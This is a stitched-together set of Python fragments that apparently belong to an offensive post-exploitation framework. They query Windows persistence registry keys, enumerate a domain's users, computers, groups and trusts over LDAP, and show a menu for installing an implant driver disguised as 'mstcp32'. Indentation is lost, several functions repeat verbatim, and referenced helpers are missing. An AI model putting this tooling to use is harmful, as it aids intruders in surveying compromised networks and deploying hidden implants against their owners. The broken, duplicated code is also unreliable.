def main():
flags = dsz.control.Method()
ops.preload('registryquery')
ops.info('Registry checks')
dsz.control.echo.On()
dsz.cmd.Run(
'registryquery -hive L -key "SYSTEM\\currentcontrolset\\services\\tcpip\\parameters\\winsock" -value HelperDLLName'
)
dsz.cmd.Run(
'registryquery -hive L -key "software\\microsoft\\windows nt\\currentversion\\\\windows" -value AppInit_Dlls'
)
dsz.cmd.Run(
'registryquery -hive L -key "software\\microsoft\\windows\\currentversion\\run"'
)
dsz.cmd.Run(
'registryquery -hive L -key "software\\microsoft\\windows\\currentversion\\runonce"'
)
dsz.cmd.Run(
'registryquery -hive L -key "software\\microsoft\\windows\\currentversion\\runonceex"'
)
dsz.control.echo.Off()
ops.info('Querying winlogon and processor keys in the background.')
dsz.cmd.Run(
'background registryquery -hive L -key "software\\microsoft\\windows nt\\currentversion\\winlogon"'
)
dsz.cmd.Run(
'background registryquery -hive L -key "HARDWARE\\DESCRIPTION\\System\\CentralProcessor" -recursive'
)
def _actual_execute(self):
if self.dszquiet:
x = dsz.control.Method()
dsz.control.echo.Off()
cmdstr = str(self)
if (ops.env.get(('OPS_SAFE_%s' % self.plugin)) is not None):
cmdstr = ('stopaliasing ' + cmdstr)
if ((not self.dszquiet) and (self.plugin not in NEVER_PRELOAD)):
ops.preload(self.plugin)
dszflag = dsz.RUN_FLAG_RECORD
if self.norecord:
dszflag = 0
timestamp = datetime.datetime.now()
(success, cmdid) = dsz.cmd.RunEx(cmdstr, dszflag)
self.__success = success
self.__channel = cmdid
self.__result = None
try:
self.__result = ops.data.getDszObject(cmdid=cmdid)
if self.autocache:
ops.db.get_voldb().save_ops_object(self.__result)
self.__result.__dict__['cache_timestamp'] = timestamp
return self.__result
except ImportError:
return None
def main():
flags = dsz.control.Method()
ops.preload('registryquery')
ops.info('Registry checks')
dsz.control.echo.On()
dsz.cmd.Run('registryquery -hive L -key "SYSTEM\\currentcontrolset\\services\\tcpip\\parameters\\winsock" -value HelperDLLName')
dsz.cmd.Run('registryquery -hive L -key "software\\microsoft\\windows nt\\currentversion\\\\windows" -value AppInit_Dlls')
dsz.cmd.Run('registryquery -hive L -key "software\\microsoft\\windows\\currentversion\\run"')
dsz.cmd.Run('registryquery -hive L -key "software\\microsoft\\windows\\currentversion\\runonce"')
dsz.cmd.Run('registryquery -hive L -key "software\\microsoft\\windows\\currentversion\\runonceex"')
dsz.control.echo.Off()
ops.info('Querying winlogon and processor keys in the background.')
dsz.cmd.Run('background registryquery -hive L -key "software\\microsoft\\windows nt\\currentversion\\winlogon"')
dsz.cmd.Run('background registryquery -hive L -key "HARDWARE\\DESCRIPTION\\System\\CentralProcessor" -recursive')
def main():
attr_want_dict = {}
attr_want_dict['objectCategory=computer'] = [
'cn', 'description', 'displayname', 'name', 'whenCreated',
'whenChanged', 'lastLogon', 'logonCount', 'operatingSystem',
'operatingSystemVersion', 'operatingSystemServicePack', 'dNSHostName'
]
attr_want_dict['(&(objectCategory=Person)(objectClass=User))'] = [
'cn', 'givenName', 'displayName', 'name', 'whenCreated', 'whenChanged',
'lastLogon', 'logonCount', 'badPwdCount', 'pwdLastSet',
'badPasswordTime', 'lastLogonTimestamp', 'accountExpires',
'logonCount', 'managedObjects', 'memberOf'
]
attr_want_dict['objectClass=group'] = [
'distinguishedName', 'description', 'memberOf'
]
attr_want_dict[
'(|(objectClass=site)(objectCategory=organizationalUnit)(objectCategory=domainDNS))'] = [
'canonicalName', 'distinguishedName', 'gPLink'
]
attr_want_dict[
'(|(objectCategory=organizationalUnit)(objectCategory=domainDNS))'] = [
'canonicalName', 'distinguishedName', 'gPLink'
]
attr_want_dict['objectClass=PrintQueue'] = [
'distinguishedName', 'serverName', 'driverName'
]
attr_want_dict['objectClass=rRASAdministrationConnectionPoint'] = [
'distinguishedName', 'whenCreated', 'whenChanged'
]
attr_want_dict['objectClass=site'] = [
'distinguishedName', 'whenCreated', 'whenChanged'
]
attr_want_dict['objectClass=trustedDomain'] = [
'distinguishedName', 'trustDirection', 'trustType', 'flatName'
]
attr_want_dict['objectCategory=organizationalUnit'] = [
'distinguishedName', 'description', 'whenCreated', 'whenChanged'
]
ops.preload('ldap')
ds_menu = ops.menu.Menu()
header = '=========== Dsquery (ldap) ==========='
header = ((((('=' * len(header)) + '\n') + header) + '\n') +
('=' * len(header)))
ds_menu.set_heading(header)
ds_menu.add_toggle_option(option='Print to disk',
section='Configuration',
state='Enabled',
enabled='Enabled',
disabled='Disabled')
ds_menu.add_toggle_option(option='Print to screen',
section='Configuration',
state='Disabled',
enabled='Enabled',
disabled='Disabled')
ds_menu.add_toggle_option(option='Minimal',
section='Configuration',
state='Disabled',
enabled='Enabled',
disabled='Disabled')
ds_menu.add_ipv4_option(option='Target',
section='Configuration',
ip='127.0.0.1')
ds_menu.add_int_option(option='Safety', section='Configuration', state=100)
ds_menu.add_option(option='Query computers',
section='Default Queries',
callback=runldap,
filter='objectCategory=computer',
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Query_computers')
ds_menu.add_option(option='Query users',
section='Default Queries',
callback=runldap,
filter='(&(objectCategory=Person)(objectClass=User))',
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Query_users')
ds_menu.add_option(option='Query groups',
section='Default Queries',
callback=runldap,
filter='objectClass=group',
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Query_groups')
ds_menu.add_option(
option='Query audit policy w/ sites (logs to GC server)',
section='Default Queries',
callback=runldap,
filter=
'(|(objectClass=site)(objectCategory=organizationalUnit)(objectCategory=domainDNS))',
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Query_audit_policy_with_sites')
ds_menu.add_option(
option='Query audit policy w/o sites',
section='Default Queries',
callback=runldap,
filter=
'(|(objectCategory=organizationalUnit)(objectCategory=domainDNS))',
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Query_audit_policy_without_sites')
ds_menu.add_option(option='Query printers',
section='Default Queries',
callback=runldap,
filter='objectClass=PrintQueue',
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Query_printers')
ds_menu.add_option(option='Query rras',
section='Default Queries',
callback=runldap,
filter='objectClass=rRASAdministrationConnectionPoint',
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Query_rras')
ds_menu.add_option(option='Query sites (logs to GC server)',
section='Default Queries',
callback=runldap,
filter='objectClass=site',
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Query_sites')
ds_menu.add_option(option='Query trusts',
section='Default Queries',
callback=runldap,
filter='objectClass=trustedDomain',
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Query_trusts')
ds_menu.add_option(option='Query organizational units',
section='Default Queries',
callback=runldap,
filter='objectCategory=organizationalUnit',
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Query_organizational_units')
ds_menu.add_option(option='Search for computers',
section='Default Searches',
callback=querycomps,
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Search_for_computers')
ds_menu.add_option(option='Search for users',
section='Default Searches',
callback=queryusers,
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Search_for_users')
ds_menu.add_option(option='Search for groups',
section='Default Searches',
callback=querygroups,
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Search_for_groups')
ds_menu.add_option(option='Search for users by group',
section='Default Searches',
callback=queryuserbygroup,
menu=ds_menu,
attr_want_dict=attr_want_dict,
query='Search_for_users_by_group')
ds_menu.add_option(option='Manual ldap query',
section='Advanced',
callback=manual,
menu=ds_menu)
ds_menu.execute(exiton=[0], default=0)
return 0
def main():
ops.preload('registryquery')
ops.preload('drivers')
ops.preload('put')
ops.preload('matchfiletimes')
ops.preload('registryadd')
ops.preload('registrydelete')
ops.preload('delete')
if (not dsz.version.checks.windows.Is2000OrGreater()):
dsz.ui.Echo('Target is pre Windows 2000! Cannot install, educate yourself', dsz.ERROR)
return 0
if dsz.version.checks.IsOs64Bit():
dsz.ui.Echo('Target is x64! Cannot install, educate yourself', dsz.ERROR)
return 0
if dsz.version.checks.windows.IsVistaOrGreater():
dsz.ui.Echo('Target is Vista+! Cannot install, educate yourself', dsz.ERROR)
return 0
st_menu = ops.menu.Menu()
implantid = getimplantID()
drivername = 'mstcp32'
st_menu.set_heading(('ST %s installation menu' % stVersion))
st_menu.add_str_option(option='Driver Name', section='Configuration', state=drivername)
st_menu.add_hex_option(option='Implant ID', section='Configuration', state=implantid)
st_menu.add_option(option='Install Driver', section='Installation', callback=install, passed_menu=st_menu)
st_menu.add_option(option='Load Driver', section='Installation', callback=load, passed_menu=st_menu)
st_menu.add_option(option='Verify Installation', section='Installation', callback=verifyinstalled, passed_menu=st_menu)
st_menu.add_option(option='Verify Running', section='Installation', callback=verifyrunning, passed_menu=st_menu)
st_menu.add_option(option='Uninstall ST', section='Uninstall', callback=uninstall, passed_menu=st_menu)
st_menu.add_option(option='Unload Driver', section='Uninstall', callback=unload, passed_menu=st_menu)
st_menu.execute(exiton=[0], default=0)
def main():
ops.preload('registryquery')
ops.preload('drivers')
ops.preload('put')
ops.preload('matchfiletimes')
ops.preload('registryadd')
ops.preload('registrydelete')
ops.preload('delete')
if (not dsz.version.checks.windows.Is2000OrGreater()):
dsz.ui.Echo('Target is pre Windows 2000! Cannot install, educate yourself', dsz.ERROR)
return 0
if dsz.version.checks.IsOs64Bit():
dsz.ui.Echo('Target is x64! Cannot install, educate yourself', dsz.ERROR)
return 0
if dsz.version.checks.windows.IsVistaOrGreater():
dsz.ui.Echo('Target is Vista+! Cannot install, educate yourself', dsz.ERROR)
return 0
st_menu = ops.menu.Menu()
implantid = getimplantID()
drivername = 'mstcp32'
st_menu.set_heading(('ST %s installation menu' % stVersion))
st_menu.add_str_option(option='Driver Name', section='Configuration', state=drivername)
st_menu.add_hex_option(option='Implant ID', section='Configuration', state=implantid)
st_menu.add_option(option='Install Driver', section='Installation', callback=install, passed_menu=st_menu)
st_menu.add_option(option='Load Driver', section='Installation', callback=load, passed_menu=st_menu)
st_menu.add_option(option='Verify Installation', section='Installation', callback=verifyinstalled, passed_menu=st_menu)
st_menu.add_option(option='Verify Running', section='Installation', callback=verifyrunning, passed_menu=st_menu)
st_menu.add_option(option='Uninstall ST', section='Uninstall', callback=uninstall, passed_menu=st_menu)
st_menu.add_option(option='Unload Driver', section='Uninstall', callback=unload, passed_menu=st_menu)
st_menu.execute(exiton=[0], default=0)
def main():
ops.preload('language')
flags = dsz.control.Method()
dsz.control.echo.On()
ops.info('Querying language')
dsz.cmd.Run('language')
def main():
ops.preload('language')
flags = dsz.control.Method()
dsz.control.echo.On()
ops.info('Querying language')
dsz.cmd.Run('language')